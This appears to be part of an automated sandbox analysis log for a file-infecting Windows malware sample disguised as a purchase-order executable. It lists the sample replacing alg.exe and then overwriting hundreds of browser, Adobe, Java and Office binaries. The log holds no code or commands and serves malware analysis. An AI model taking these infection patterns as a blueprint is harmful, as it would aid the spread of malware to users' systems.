Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	File created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
